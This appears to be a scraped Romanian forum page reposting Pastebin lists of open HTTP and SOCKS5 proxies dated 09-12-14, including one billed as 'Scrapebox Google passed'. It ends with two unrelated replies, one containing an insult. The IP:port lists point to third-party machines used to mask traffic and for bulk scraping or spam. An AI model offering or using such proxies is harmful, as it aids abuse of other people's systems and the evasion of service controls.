223.84.166.187:8123 223.84.168.178:8123 223.84.169.224:8123 223.84.169.67:8123 223.84.184.123:8123 223.84.187.127:8123 223.84.192.161:8123 223.84.195.138:8123 223.84.196.129:8123 223.84.197.251:8123 223.84.199.160:8123 223.84.203.6:8123 223.84.207.165:8123 223.84.207.171:8123 223.84.207.245:8123 223.84.208.107:8123 223.84.209.201:8123 223.84.219.54:8123 223.84.232.138:8123 223.84.233.116:8123 223.84.233.180:8123 223.84.233.33:8123 223.84.235.188:8123 223.84.236.140:8123 223.84.236.199:8123 223.84.248.138:8123 223.84.26.137:8123 223.84.26.97:8123 223.84.28.225:8123 223.84.32.27:8123 223.84.37.189:8123 223.84.4.127:8123 223.84.4.44:8123 223.84.5.96:8123 223.84.6.20:8123 223.84.7.235:8123 223.84.98.109:8123 223.85.100.233:8123 223.85.106.241:8123 223.85.110.24:8123 223.85.110.247:8123 223.85.16.181:8123 223.85.17.103:8123 223.85.18.140:8123 223.85.18.226:8123 223.85.18.242:8123 223.85.19.123:8123 223.85.19.169:8123 223.85.19.237:8123 223.85.20.150:8123 223.85.20.60:8123 223.85.21.121:8123 223.85.21.98:8123 223.85.22.7:8123 223.85.23.162:8123 223.85.23.245:8123 223.85.23.63:8123 223.85.26.147:8123 223.85.60.62:8123 223.85.62.130:8123 223.85.80.6:8123 223.85.81.157:8123 223.85.81.201:8123 223.85.81.88:8123 223.85.83.112:8123 223.85.83.233:8123 223.85.93.83:8123 223.85.96.58:8123 223.85.97.15:8123 223.85.99.183:8123 223.85.99.76:8123 223.86.100.122:8123 223.86.100.239:8123 223.86.101.151:8123 223.86.101.168:8123 223.86.102.210:8123 223.86.102.252:8123 223.86.102.94:8123 223.86.11.57:8123 223.86.112.253:8123 223.86.113.222:8123 223.86.115.19:8123 223.86.116.135:8123 223.86.116.168:8123 223.86.116.31:8123 223.86.116.40:8123 223.86.117.212:8123 223.86.117.233:8123 223.86.117.246:8123 223.86.120.14:8123 223.86.127.146:8123 223.86.127.54:8123 223.86.130.161:8123 223.86.131.144:8123 223.86.132.189:8123 223.86.132.98:8123 223.86.134.146:8123 223.86.14.134:8123 223.86.14.165:8123 223.86.14.210:8123 223.86.14.78:8123 223.86.171.100:8123 223.86.171.244:8123 223.86.200.49:8123 223.86.203.102:8123 223.86.208.182:8123 223.86.209.13:8123 223.86.209.141:8123 223.86.211.234:8123 223.86.212.120:8123 223.86.213.115:8123 223.86.213.164:8123 223.86.213.196:8123 223.86.213.241:8123 223.86.213.72:8123 223.86.213.96:8123 223.86.216.22:8123 223.86.217.168:8123 223.86.218.4:8123 223.86.220.112:8123 223.86.220.177:8123 223.86.220.55:8123 223.86.221.54:8123 223.86.223.177:8123 223.86.223.254:8123 223.86.223.94:8123 223.86.3.82:8123 223.86.35.212:8123 223.86.4.124:8123 223.86.4.75:8123 223.86.5.166:8123 223.86.6.160:8123 223.86.6.188:8123 223.86.6.252:8123 223.86.65.143:8123 223.86.68.23:8123 223.86.68.38:8123 223.86.7.171:8123 223.86.7.231:8123 223.86.7.6:8123 223.86.75.113:8123 223.86.76.12:8123 223.86.76.121:8123 223.86.76.28:8123 223.86.8.215:8123 223.86.97.101:8123 223.86.99.213:8123 223.86.99.52:8123 223.87.159.75:8123 223.87.184.195:8123 223.87.185.213:8123 223.87.186.83:8123 223.87.4.20:3128 223.99.189.102:8090 23.99.192.109:3128 27.105.143.30:8088 27.105.16.69:9064 27.105.40.3:9064 27.106.42.231:9064 27.131.173.2:8080 27.131.47.131:8080 27.147.1.62:9064 27.147.170.248:9064 27.159.250.51:8118 27.2.132.62:9064 27.3.207.169:9064 27.3.23.15:9064 27.4.197.160:9064 27.49.68.102:9064 27.5.50.31:9064 27.51.133.72:9064 27.51.2.109:9064 27.6.8.140:9064 31.131.67.76:8080 31.15.48.12:80 31.220.42.77:8080 36.224.17.150:9064 36.224.214.91:9064 36.225.36.44:9064 36.225.88.73:9064 36.227.234.92:9064 36.229.4.29:9064 36.230.52.19:9064 36.230.53.197:8088 36.230.82.233:9064 36.231.127.164:8088 36.232.170.88:9064 36.232.42.12:9064 36.232.67.226:9064 36.232.95.237:9064 36.233.161.37:9064 36.233.36.47:9064 36.234.179.202:9064 36.234.32.34:9064 36.234.34.93:9064 36.237.57.57:9064 36.239.124.234:9064 36.250.69.4:80 36.250.74.87:80 36.250.74.88:80 36.44.120.115:8080 36.72.167.179:8080 36.74.72.205:3128 36.77.127.16:8080 36.80.167.119:9064 36.80.34.206:8080 36.81.3.5:515 36.84.142.63:9064 36.85.218.199:8080 36.88.169.184:9064 37.16.71.41:8080 37.187.112.134:3128 37.187.237.120:80 37.232.234.212:9064 37.239.46.26:80 37.239.46.50:80 37.49.137.243:3128 37.49.137.243:80 39.189.66.74:8123 39.65.225.89:8585 39.67.154.117:8585 41.188.49.159:8080 41.188.49.163:3128 41.188.49.164:3128 41.203.89.131:8080 41.222.196.52:8080 41.222.44.42:8080 41.223.119.156:3128 41.75.201.146:8080 41.78.208.93:8080 41.86.25.158:8080 46.119.222.118:3128 46.39.192.53:8080 46.40.37.161:80 46.40.38.110:8080 49.204.149.60:9064 49.204.184.132:9064 49.204.4.223:9064 49.204.49.46:9064 49.205.197.223:9064 49.205.26.143:9064 49.205.43.15:9064 49.206.171.156:9064 49.206.43.207:9064 49.207.108.80:9064 49.207.113.190:9064 49.207.126.213:9064 49.75.238.14:8123 5.102.170.20:3128 5.135.146.173:80 5.149.101.137:80 5.56.12.1:8080 5.56.61.185:19350 5.56.61.186:19350 54.148.68.88:3128 54.188.223.55:60884 54.244.254.219:3128 54.64.164.168:3128 54.77.29.185:3128 54.92.26.86:3128 58.115.107.63:9064 58.214.5.229:80 58.215.185.46:82 58.251.131.251:8888 58.251.78.71:8088 58.252.167.103:80 58.252.69.194:8888 58.253.238.242:80 58.67.159.50:80 59.115.137.231:8088 59.115.140.216:9064 59.115.145.50:9064 59.115.190.59:9064 59.115.237.190:9064 59.115.240.84:8088 59.120.220.130:9064 59.124.220.92:80 59.124.220.93:80 59.149.1.82:80 59.173.130.20:3128 59.41.47.148:18764 59.44.152.110:9999 59.46.72.245:8080 59.50.34.243:80 59.95.228.79:9064 60.194.100.51:80 60.195.3.180:8118 60.198.17.110:9064 60.206.246.66:8118 60.213.189.170:3988 60.214.219.28:8585 60.216.217.207:8585 60.25.36.63:18186 61.149.95.8:8888 61.154.2.156:8118 61.156.3.166:80 61.156.35.2:3128 61.157.126.37:18000 61.158.173.188:9999 61.184.192.42:80 61.223.185.223:9064 61.224.158.114:9064 61.224.201.11:9064 61.227.216.92:9064 61.227.54.167:9064 61.227.77.128:9064 61.227.79.216:9064 61.228.179.199:9064 61.228.61.88:9064 61.230.27.230:9064 61.231.194.225:9064 61.231.48.39:9064 61.232.6.164:8081 61.51.238.135:808 61.53.143.179:80 61.54.221.201:3128 61.62.205.246:8088 61.62.206.28:8088 61.62.5.46:8088 61.64.179.158:9064 61.7.191.89:9064 61.8.70.114:8080 62.103.107.9:80 62.75.229.121:3128 62.82.23.1:8080 64.156.195.147:3128 64.156.195.150:3128 64.31.22.131:7808 64.31.22.131:8089 64.31.22.143:7808 64.31.22.143:8089 65.49.14.147:3080 65.49.14.147:3128 66.135.33.230:3128 66.162.208.10:3128 66.193.69.30:8080 67.148.11.168:443 67.207.166.174:7808 67.207.166.174:8089 69.10.137.139:8000 69.163.47.19:8118 69.197.148.18:8089 69.64.49.7:3128 70.99.146.246:7004 74.207.242.38:3128 75.133.69.131:8080 77.236.152.177:13076 77.236.155.170:13076 77.236.156.77:13076 77.236.157.70:13076 77.245.171.70:3128 77.247.33.142:13076 77.75.88.200:8080 77.89.244.62:80 78.130.201.110:8080 79.106.108.139:8080 79.143.181.127:3128 80.64.81.34:3128 81.138.80.9:8080 81.20.145.100:3128 82.166.34.48:8085 82.208.136.106:3128 82.223.148.124:10150 82.223.148.124:10732 83.222.221.137:8080 83.241.46.175:8080 85.202.7.27:8080 85.217.255.155:8080 85.234.20.131:3128 85.236.25.20:9090 85.236.25.21:9090 85.236.25.22:9090 85.29.51.15:3128 86.51.186.34:3128 87.252.230.142:80 88.132.82.236:8088 88.159.116.151:80 88.198.24.108:3128 89.180.94.61:9064 89.181.63.116:9064 89.232.139.253:80 89.46.101.122:7808 89.46.101.122:8089 91.121.192.178:3128 91.121.52.75:8118 91.135.22.26:8080 92.114.141.239:3128 93.115.10.11:8080 93.116.49.221:8080 93.123.39.112:9064 93.81.252.75:8080 94.140.213.234:3128 94.142.109.193:10180 94.191.24.54:13076 94.203.226.50:80 94.247.174.121:18080 94.247.174.124:18080 94.247.174.125:18080 95.69.54.35:9064 [/LIST] Sursa: 09-12-14 | Fast Proxy Server List (3678) - Pastebin.com

09-12-14 | VIP Socks 5 Servers (41) Checked & filtered premium servers 101.176.109.233:49679 107.171.227.132:27345 124.160.35.2:808 173.48.85.6:47464 173.74.93.133:48641 174.1.13.143:50115 180.153.139.246:8888 198.27.67.24:53092 199.201.121.162:443 199.91.228.197:42149 207.190.107.166:37686 217.133.47.124:18280 217.172.179.88:13729 24.200.180.120:25389 42.51.152.102:9050 47.22.36.178:25802 58.165.230.93:34690 61.147.67.2:9125 62.201.214.203:3128 64.147.215.108:2777 69.113.219.131:26587 69.253.214.65:22130 70.183.2.100:46743 71.117.166.239:36644 71.177.42.105:41630 71.183.79.46:38565 72.133.32.186:46161 72.93.108.40:40722 73.55.188.147:34498 76.104.153.62:54598 78.39.178.2:443 79.180.131.50:5120 81.0.240.113:9050 82.194.76.183:10080 83.143.27.42:443 87.106.48.142:10080 88.178.116.157:60871 91.246.235.157:16122 96.33.210.159:23739 96.42.246.8:31949 98.193.56.63:42666 Sursa: 09-12-14 | VIP Socks 5 Servers (41) - Pastebin.com

09-12-14 | Free Scrapebox Google Passed HTTP Proxies (109) Checked & filtered (Timeout 45) 198.27.120.118:8082 5.149.36.1:3128 189.104.162.98:80 189.70.180.159:8080 41.129.74.215:8080 177.23.151.146:8080 141.255.161.24:3128 87.252.246.22:3128 187.5.122.231:8080 194.190.110.222:3128 190.201.75.225:3128 106.187.92.124:80 219.92.6.245:3128 183.89.40.48:3128 201.79.63.143:8080 2.49.99.108:8000 80.58.29.164:80 123.255.249.194:8081 202.29.240.161:8080 186.222.100.54:3128 180.183.67.20:3128 183.89.43.231:3128 110.77.205.130:3128 176.9.216.184:80 200.11.216.67:8080 198.27.115.66:8080 180.183.86.3:80 41.205.107.213:8080 14.139.120.124:8080 118.99.126.149:8080 87.236.211.37:3128 110.139.11.59:80 201.65.24.245:3128 174.129.103.50:80 61.8.77.74:3128 71.12.182.106:3128 209.222.151.21:3128 190.236.191.84:8080 23.22.233.36:3128 42.121.17.194:80 110.136.191.216:3128 42.121.18.43:8082 80.94.112.132:8080 205.213.195.80:8080 198.27.114.173:3128 49.212.149.114:8090 37.251.64.213:80 46.209.63.37:3128 41.42.205.214:8080 94.31.68.174:80 41.205.107.213:80 195.138.68.191:8085 78.46.63.51:8084 180.94.88.58:8080 5.152.193.142:8081 210.101.131.231:8080 41.129.3.67:8080 54.247.167.164:8088 89.233.104.79:8081 190.73.138.126:8080 186.207.70.52:3128 201.248.231.183:8080 2.51.1.193:8118 118.99.75.22:8080 190.233.121.110:8080 180.94.88.58:80 186.94.82.195:8080 61.8.75.211:8080 210.64.12.2:80 202.137.26.102:3128 88.248.13.15:8086 180.183.237.240:3128 201.18.4.213:8080 183.89.41.120:3128 175.103.44.92:80 176.31.165.26:3128 180.211.95.190:80 2.51.220.218:8118 180.247.133.241:80 190.75.175.197:8080 180.246.242.133:8080 180.253.62.21:80 201.79.204.208:80 46.211.74.226:54321 180.183.62.201:3128 190.207.128.197:8080 121.15.164.123:8088 183.89.68.208:3128 186.160.17.87:8000 200.181.125.43:3128 190.90.199.130:8080 222.124.35.116:8080 183.89.80.114:3128 49.128.176.178:3128 119.42.80.11:8080 41.45.252.67:80 190.42.202.109:8080 5.9.236.123:443 118.97.212.162:8080 180.183.11.216:3128 203.223.47.215:3128 177.35.37.94:8080 186.93.98.204:8118 180.183.207.183:3128 183.89.85.100:3128 41.236.173.11:3128 121.96.166.72:3128 41.204.250.62:8080 195.175.83.146:3129 Sursa: 09-12-14 | Free Scrapebox Google Passed HTTP Proxies (109) - Pastebin.com

Super. Un tutorial mai detaliat legat doar de java bytecode / ASM stie cineva?

Cere sa iti dea PM cine are nevoie. O sa iti manance timp sa le raspunzi, dar macar stii cine e retardatul.